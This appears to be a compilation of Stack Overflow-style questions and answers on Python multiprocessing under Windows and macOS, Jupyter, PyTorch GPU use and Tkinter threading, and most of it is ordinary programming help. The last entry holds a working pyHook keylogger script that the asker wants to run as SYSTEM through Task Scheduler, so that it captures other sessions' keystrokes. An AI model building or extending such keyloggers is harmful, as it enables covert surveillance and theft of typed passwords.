`ProcessPoolExecutor` works on Ubuntu, but fails with `BrokenProcessPool` when running Jupyter 5.0.0 notebook with Python 3.5.3 on Windows 10

I'm running Jupyter 5.0.0 notebook with Python 3.5.3 on Windows 10. The following example code fails to run:
from concurrent.futures import as_completed, ProcessPoolExecutor
import time
import numpy as np

def do_work(idx1, idx2):
    time.sleep(0.2)
    return np.mean([idx1, idx2])

with ProcessPoolExecutor(max_workers=4) as executor:
    futures = set()
    for idx in range(32):
        future = executor.submit(do_work, idx, idx * 2)
        futures.add(future)
    for future in as_completed(futures):
        print(future.result())
... and throws BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending.
The code works perfectly fine on Ubuntu 14.04.
I understand that Windows doesn't have os.fork, so multiprocessing is handled differently and doesn't always play nicely with interactive mode and Jupyter.
What are some workarounds to make ProcessPoolExecutor work in this case?
There are some similar questions, but they relate to multiprocessing.Pool:
multiprocessing.Pool in jupyter notebook works on linux but not windows

Closer inspection shows that a Jupyter notebook can run external Python modules that are parallelized with ProcessPoolExecutor. So one solution is to put the parallelizable part of your code in a module and call it from the Jupyter notebook.
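A minimal sketch of the plain-module approach follows. The file name workers.py and the helper run_in_pool are hypothetical; to keep the example self-contained, it writes workers.py into a temporary directory and puts that directory on sys.path, whereas in practice you would simply save workers.py next to the notebook and `import workers` in a cell. It also uses plain arithmetic instead of np.mean to avoid the NumPy dependency.

```python
import sys
import tempfile
import textwrap
from concurrent.futures import ProcessPoolExecutor, as_completed
from pathlib import Path

# Contents of the hypothetical workers.py. Because do_work lives in a real,
# importable module, the pool pickles it as "workers.do_work" and each
# worker process can import it by name.
WORKERS_SOURCE = textwrap.dedent("""
    import time

    def do_work(idx1, idx2):
        time.sleep(0.2)
        return (idx1 + idx2) / 2
""")


def run_in_pool(n_tasks=8, max_workers=4):
    with tempfile.TemporaryDirectory() as tmp:
        # Stand-in for saving workers.py next to the notebook.
        Path(tmp, "workers.py").write_text(WORKERS_SOURCE)
        sys.path.insert(0, tmp)
        try:
            import workers  # what the notebook cell would do

            with ProcessPoolExecutor(max_workers=max_workers) as executor:
                futures = [executor.submit(workers.do_work, idx, idx * 2)
                           for idx in range(n_tasks)]
                return sorted(f.result() for f in as_completed(futures))
        finally:
            sys.path.remove(tmp)


if __name__ == "__main__":
    print(run_in_pool())
```

The notebook itself only ever submits functions that belong to an importable module, so nothing defined in a cell has to be found by the worker.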
That said, this can be generalized into a utility. The following can be saved as a module, say winprocess.py, and imported from Jupyter:
import inspect
import types


def execute_source(callback_imports, callback_name, callback_source, args):
    # Runs in the worker process: rebuild the notebook function from its
    # source in a fresh namespace (imports first), then call it.
    namespace = {}
    for callback_import in callback_imports:
        exec(callback_import, namespace)
    exec(callback_source, namespace)
    callback = namespace[callback_name]
    return callback(*args)


def submit(executor, callback, *args):
    # Runs in the notebook: ship the function's source text and the import
    # statements it may need instead of the function object itself.
    callback_source = inspect.getsource(callback)
    callback_imports = list(imports(callback.__globals__))
    callback_name = callback.__name__
    future = executor.submit(
        execute_source,
        callback_imports, callback_name, callback_source, args
    )
    return future


def imports(callback_globals):
    # Turn every module object in the caller's globals into an import
    # statement, keeping aliases such as "import numpy as np".
    for name, val in list(callback_globals.items()):
        if (isinstance(val, types.ModuleType)
                and val.__name__ != 'builtins'
                and val.__name__ != __name__):
            import_line = 'import ' + val.__name__
            if val.__name__ != name:
                import_line += ' as ' + name
            yield import_line
Here is how you would use this:
from concurrent.futures import as_completed, ProcessPoolExecutor
import time
import numpy as np
import winprocess

def do_work(idx1, idx2):
    time.sleep(0.2)
    return np.mean([idx1, idx2])

with ProcessPoolExecutor(max_workers=4) as executor:
    futures = set()
    for idx in range(32):
        future = winprocess.submit(
            executor, do_work, idx, idx * 2
        )
        futures.add(future)
    for future in as_completed(futures):
        print(future.result())
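Notice that executor.submit has been replaced with winprocess.submit, and the original executor is passed to it as the first argument.
What happens here is that the source code of the notebook function, along with the import statements it may need, is sent to the worker as plain strings, and winprocess.execute_source rebuilds and runs the function there. This matters because a function defined in the notebook is pickled by reference (as __main__.do_work), and a freshly spawned Windows worker has no notebook namespace in which to look it up. execute_source itself lives in an importable module, so the worker can always find it.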
Imports are handled in such a way as to maintain aliases. The import magic can be removed if you make sure to import everything needed for the function being executed inside the function itself.
Also, this solution only works if you pass all necessary variables to the function as arguments. The function should be self-contained, so to speak, but I think that's a requirement of ProcessPoolExecutor as well. Finally, make sure the function doesn't call other functions defined elsewhere in the notebook: only modules are imported in the worker, so other notebook functions won't be available there.
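Why does the notebook function have to travel as source code at all? pickle serializes a plain function by reference: it stores only the module and the qualified name, not the code. The small check below (do_work is just a stand-in) shows this; in a spawned worker whose __main__ is not the notebook, that name lookup fails, which is most likely what kills the worker and surfaces as BrokenProcessPool.

```python
import pickle


def do_work(idx1, idx2):
    return (idx1 + idx2) / 2


payload = pickle.dumps(do_work)

# The bytes contain the function's module name and its name
# (e.g. "__main__" and "do_work" when run as a script), but not its body.
print(do_work.__module__, len(payload))
print(b"do_work" in payload, b"idx1" in payload)

# Unpickling simply looks the name up again. That works in this process,
# but not in a worker that cannot import the module holding do_work.
restored = pickle.loads(payload)
print(restored is do_work)
```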

Related

Why does huggingface hang on list input for pipeline sentiment-analysis?

With Python 3.10 and the latest version of huggingface transformers,
for simple code like this:
from transformers import pipeline
input_list = ['How do I test my connection? (Windows)', 'how do I change my payment method?', 'How do I contact customer support?']
classifier = pipeline('sentiment-analysis')
results = classifier(input_list)
the program hangs and prints the following error:
File ".......env/lib/python3.10/multiprocessing/spawn.py", line 134, in _check_not_importing_main
raise RuntimeError('''
RuntimeError:
An attempt has been made to start a new process before the
current process has finished its bootstrapping phase.
This probably means that you are not using fork to start your
child processes and you have forgotten to use the proper idiom
in the main module:
if __name__ == '__main__':
freeze_support()
...
But if I replace the list input with a string, it works:
from transformers import pipeline
classifier = pipeline('sentiment-analysis')
result = classifier('How do I test my connection? (Windows)')
The list input makes the pipeline start worker processes (the traceback comes from multiprocessing/spawn.py), so the script needs the if __name__ == '__main__': idiom from the error message, with the work moved into a main function. The following update works:
from transformers import pipeline

def main():
    input_list = ['How do I test my connection? (Windows)',
                  'how do I change my payment method?',
                  'How do I contact customer support?']
    classifier = pipeline('sentiment-analysis')
    results = classifier(input_list)

if __name__ == '__main__':
    main()
So the question reduces to: where should freeze_support() go in a Python script?
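Per the multiprocessing documentation, freeze_support() is called straight after the if __name__ == '__main__': line of the main module, and it has no effect unless the program has been frozen into a Windows executable. A minimal sketch, where square and main are illustrative names and a small Pool stands in for the pipeline's worker processes:

```python
import multiprocessing as mp


def square(x):
    # Module-level function, so spawned workers can import it by name.
    return x * x


def main():
    # All process-starting code lives in main(), never at import time.
    with mp.Pool(processes=2) as pool:
        return pool.map(square, range(5))


if __name__ == '__main__':
    mp.freeze_support()  # first line under the guard; a no-op unless frozen
    print(main())
```

For the pipeline script above, the same line would simply go between if __name__ == '__main__': and main().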

Multiprocessing runtime error freeze_support() in Mac 64 bit

I am trying to learn threading and multiprocessing on macOS, but I am unable to launch the processes: Python gives the following error message.
Error
RuntimeError:
An attempt has been made to start a new process before the
current process has finished its bootstrapping phase.
This probably means that you are not using fork to start your
child processes and you have forgotten to use the proper idiom
in the main module:
if __name__ == '__main__':
freeze_support()
...
The "freeze_support()" line can be omitted if the program
is not going to be frozen to produce an executable.
my code:
parallel_processing.py
import multiprocessing
import time

start = time.perf_counter()

def do_something():
    print('sleeping 1 sec....')
    time.sleep(1)
    return 'done sleeping...'

# do_something()
p1 = multiprocessing.Process(target=do_something)
p2 = multiprocessing.Process(target=do_something)
p1.start()
p2.start()
finish = time.perf_counter()
print(f'finished in {finish-start} seconds')
It seems that you can resolve the issue by putting your code inside an if __name__ == '__main__': block. For example:
import multiprocessing as mp
import time

def do_something():
    ...

if __name__ == '__main__':
    p1 = mp.Process(target=do_something)
    p2 = mp.Process(target=do_something)
    p1.start()
    p2.start()
    ...
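I'm not sure whether this results from a recent macOS update or from Python, but it has to do with how new processes are created, i.e. forking versus spawning (since Python 3.8, multiprocessing defaults to spawn on macOS, and a spawned child re-imports the main module). Please see this blog post for details.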
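Applied to the script from the question, a complete version might look like the sketch below. The main() wrapper and the join() calls are additions not in the original code: without join(), the timing only measures how long it takes to start the two processes, not how long they run.

```python
import multiprocessing as mp
import time


def do_something():
    print('sleeping 1 sec....')
    time.sleep(1)
    return 'done sleeping...'


def main():
    start = time.perf_counter()
    processes = [mp.Process(target=do_something) for _ in range(2)]
    for p in processes:
        p.start()
    for p in processes:
        p.join()  # wait for both children before stopping the clock
    return time.perf_counter() - start


if __name__ == '__main__':
    # 'spawn' on macOS with Python 3.8+, so the guard above is required.
    print('start method:', mp.get_start_method())
    print(f'finished in {main():.2f} seconds')
```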

How to run particular code on GPU using PyTorch?

I am using image-processing code in Python with OpenCV. Processing, say, 30 images takes a lot of time, so I tried to process the images in parallel using multiprocessing. The multiprocessing part works well on the CPU, but I want to run it on the GPU (CUDA).
I use torch.multiprocessing to run the tasks in parallel, and I move my class to torch.device('cuda') so that the whole thing runs on that device. When I run the code, it reports the device as "cuda", but no GPU processing happens.
import cv2
import numpy as np
import torch
import torch.nn as nn
from torch.multiprocessing import Process, Pool, Manager, set_start_method
import sys
import os


class RoadShoulderWidth(nn.Module):
    def __init__(self):
        super(RoadShoulderWidth, self).__init__()

    # Want to run the method below in parallel for 30 images.
    @staticmethod
    def get_dim(image, road_shoulder_width_list):
        ...  # ..... code

    def get_road_shoulder_width(self, _root_dir, _img_path_list):
        manager = Manager()
        road_shoulder_width_list = manager.list()
        processes = []
        for img_path in _img_path_list[:30]:
            img = cv2.imread(_root_dir + '/' + img_path)
            img = img[72 * 5:72 * 6, 0:1280]
            # Do work
            p = Process(target=self.get_dim, args=(img, road_shoulder_width_list))
            p.start()
            processes.append(p)
        for p in processes:
            p.join()
        return road_shoulder_width_list
I use the following code to run the class:
if __name__ == '__main__':
    root_dir = '/home/nikhil_m/r'
    img_path_list = os.listdir(root_dir)
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    print('Using device:', device)
    dataloader_kwargs = {'pin_memory': True}
    set_start_method('fork')
    obj = RoadShoulderWidth().to(device)
    val = obj.get_road_shoulder_width(str(root_dir), img_path_list)
    print(val)
    print(torch.cuda.is_available())
Can anybody suggest how to fix this?
Your class RoadShoulderWidth is an nn.Module subclass, which lets you call .to(device). That only moves the nn.Module submodules, nn.Parameters and registered buffers that are members of your RoadShoulderWidth object to the device. In your example there are none, so nothing happens.
In general, PyTorch moves data, not code, to the GPU. If all inputs of a PyTorch operation are on the GPU (e.g. in a + b, both a and b are on the GPU), the operation is executed on the GPU. You can move a tensor with a = a.to(device), given that a is a torch.Tensor; note that Tensor.to returns a new tensor rather than moving a in place.
PyTorch can only execute its own operations on GPU. It's not able to execute OpenCV code on GPU.
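To make this concrete: .to(device) on a module without parameters leaves nothing on the GPU, while a module that owns a layer such as nn.Linear gets its weights moved, and the computation then runs wherever its input tensors live. A small sketch; the class names are made up for illustration, and it falls back to the CPU when CUDA isn't available:

```python
import torch
import torch.nn as nn

device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')


class NoParams(nn.Module):
    # Like RoadShoulderWidth: no submodules or parameters, so .to() has nothing to move.
    def forward(self, x):
        return x * 2


class WithParams(nn.Module):
    def __init__(self):
        super().__init__()
        self.linear = nn.Linear(4, 2)  # its weight and bias are nn.Parameters

    def forward(self, x):
        return self.linear(x)


empty = NoParams().to(device)
model = WithParams().to(device)
print(list(empty.parameters()))         # nothing was moved
print(next(model.parameters()).device)  # the layer's weights now live on `device`

# The matrix multiply runs on the GPU only because the input is there too.
x = torch.randn(8, 4).to(device)
y = model(x)
print(y.device, y.shape)
```

OpenCV calls such as cv2.imread, or whatever get_dim does with NumPy arrays, stay on the CPU regardless of where the module lives.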

Tkinter problems with GUI when entering while loop

I have a simple GUI which runs various scripts from another Python file. Everything works fine until the GUI runs a function that includes a while loop, at which point the GUI seems to crash and become inactive. Does anybody have any ideas how this can be overcome? I believe it has something to do with the GUI being updated. Thanks. Below is a simplified version of my GUI.
GUI
#!/usr/bin/env python
# Python 3
from tkinter import *
from tkinter import ttk
from Entry import ConstrainedEntry
import tkinter.messagebox
import functions

AlarmCode = "2222"

root = Tk()
root.title("Simple Interface")

mainframe = ttk.Frame(root, padding="3 3 12 12")
mainframe.grid(column=0, row=0, sticky=(N, W, E, S))
mainframe.columnconfigure(0, weight=1)
mainframe.rowconfigure(0, weight=1)

ttk.Button(mainframe, width=12, text="ButtonTest",
           command=lambda: functions.test()).grid(
    column=5, row=5, sticky=SE)

for child in mainframe.winfo_children():
    child.grid_configure(padx=5, pady=5)

root.mainloop()
functions
import time

def test():
    period = 0
    while True:
        if period <= 100:
            time.sleep(1)
            period += 1
            print(period)
        else:
            print("100 seconds has passed")
            break
With the code above, the application crashes while the loop is running. Because of the break in the else branch, everything works fine again once the period has elapsed. I want users to be able to click while a loop is running, as this GUI will run a number of different functions.
Don't use time.sleep in the same thread as your Tkinter code: it freezes the GUI until test finishes executing. To avoid this, use the after widget method, which schedules a callback on Tkinter's event loop instead of blocking it:
# GUI
ttk.Button(mainframe, width=12, text="ButtonTest",
           command=lambda: functions.test(root)).grid(
    column=5, row=5, sticky=SE)

# functions
def test(root, period=0):
    if period <= 100:
        period += 1
        print(period)
        root.after(1000, lambda: test(root, period))
    else:
        print("100 seconds has passed")
Update:
In your comment you add that your code won't use time.sleep, so your original example may not be the most appropriate. In that case, you can create a new thread to run your intensive code.
Note that I posted the after alternative first because multithreading should be used only when it is really necessary: it adds overhead to your application and makes your code harder to debug.
from threading import Thread

ttk.Button(mainframe, width=12, text="ButtonTest",
           command=lambda: Thread(target=functions.test).start()).grid(
    column=5, row=5, sticky=SE)

# functions
import time

def test():
    for x in range(100):
        time.sleep(1)  # Simulate intense task (not real code!)
        print(x)
    print("100 seconds has passed")

pyhook user keyboard

Using Windows 7 and Python 2.7, I wrote and compiled the code below (with pyinstaller2-0). It works fine if I start it by right-clicking and choosing "Run as administrator", but when I start it through Task Scheduler as the SYSTEM user, it does not log any keys (after the 10-second wait, it just creates an empty output file). I'm thinking that maybe, because it runs under a different account, it's not hooking the "correct" keyboard?
import threading
import pyHook
import pythoncom
import time

def OnKeyboardEvent(event):
    global keylog
    keylog.append(chr(event.Ascii))
    return

class thekeylogger(threading.Thread):
    def run(self):
        hm = pyHook.HookManager()
        hm.KeyDown = OnKeyboardEvent
        hm.HookKeyboard()
        pythoncom.PumpMessages()
        return

keylog = []
thekeylogger().start()
time.sleep(10)
keys = "".join(keylog)
output_file = open('c:\\project\\test.txt', 'w')
output_file.write(keys)
output_file.close()
